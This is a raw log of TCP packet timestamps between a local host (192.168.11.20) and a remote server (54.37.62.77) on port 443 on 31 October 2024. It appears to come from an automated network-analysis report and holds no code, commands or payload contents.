                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245589972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245753050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245753050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245753050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245820999 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245853901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.246073961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.251840115 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.251894951 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252037048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252037048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252103090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252217054 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252341032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.253525972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.253580093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.253743887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.253798008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.253798962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.253830910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.254033089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.255172014 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.255227089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.255383015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.255383015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.255441904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.255459070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.255528927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.255647898 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.256759882 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.256817102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.256963015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.256963015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.257016897 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.257090092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.257203102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.297247887 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.297302961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.297461033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.297461033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.297522068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.297549009 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.297571898 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.297751904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310204029 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310215950 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310394049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310395002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310416937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310425997 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310501099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310501099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.310595036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.338727951 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.338741064 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.338949919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.338949919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.338965893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.338975906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.339051962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.339168072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.359010935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.359066963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.359225035 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.359225988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.359299898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.359324932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.359519958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360142946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360196114 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360351086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360352039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360430002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360430002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360430002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360474110 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.360697985 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.361685991 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.361749887 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.361943007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.361943007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.361994028 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.362015963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.362179041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364260912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364316940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364449978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364450932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364496946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364496946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364521980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364557981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.364715099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.367944002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.368052959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.368149996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.368149996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.368192911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.368216038 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.368275881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.368469954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.370160103 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.370230913 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.370361090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.370362043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.370405912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.370419979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.370419979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.370642900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.379225016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.379301071 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.379420996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.379420996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.379477024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.379549980 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.379714966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.380414963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.380484104 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.380590916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.380701065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.380724907 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.380901098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.381722927 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.381792068 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.381920099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.381920099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.381973028 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382044077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382173061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382632971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382697105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382785082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382827997 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382879019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382879019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.382904053 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.383081913 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.387245893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.387316942 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.387451887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.387495041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.387516022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.387547970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.387772083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.391804934 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.391870975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.392008066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.392008066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.392060041 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.392081976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.392081976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.392220020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394489050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394557953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394668102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394668102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394766092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394785881 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394953012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395610094 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395677090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395787954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395787954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395828009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395848036 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395879984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395930052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.396056890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418541908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418601990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418721914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418721914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418762922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418762922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418792009 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418895960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418975115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422467947 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422527075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422642946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422642946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422739029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422739029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422759056 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422940016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424304962 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424355030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424491882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424491882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424532890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424547911 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424585104 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424709082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426266909 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426325083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426455975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426455975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426495075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426511049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426549911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426549911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426685095 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428009033 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428066969 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428196907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428196907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428236961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428253889 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428289890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428388119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428432941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467452049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467480898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467623949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467623949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467669964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467679977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467719078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467763901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467868090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480176926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480201960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480386019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480386019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480401039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480437994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480566025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674707890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674724102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674770117 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674818039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674882889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674896955 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674961090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674961090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674972057 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674987078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675076962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675076962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675087929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675173998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675173998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675173998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675185919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675221920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675271034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675319910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675319910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675369978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675369978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675467968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675467968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675515890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675565004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675612926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675662041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675760031 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675760031 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675767899 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675810099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675810099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675810099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675810099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675868034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675868034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675961971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675965071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676049948 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676049948 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676098108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676146984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676146984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676151991 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676196098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676196098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676244974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676244974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676294088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676343918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676392078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676392078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676490068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.676529884 CET4434975554.37.62.77192.168.11.20
